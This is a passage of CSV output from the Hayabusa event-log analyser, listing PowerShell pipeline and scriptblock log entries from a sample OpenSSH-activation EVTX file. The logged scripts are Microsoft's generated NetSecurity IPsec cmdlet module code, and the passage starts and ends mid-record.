$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.082 
+09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.082 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.083 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.083 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service 
SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.083 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.084 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.084 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.085 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule"" 
ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.085 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.091 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.091 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation 
and config.evtx 2021-04-22 19:19:38.092 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.092 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.092 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 
'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] 
${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'c",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' 
$script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, 
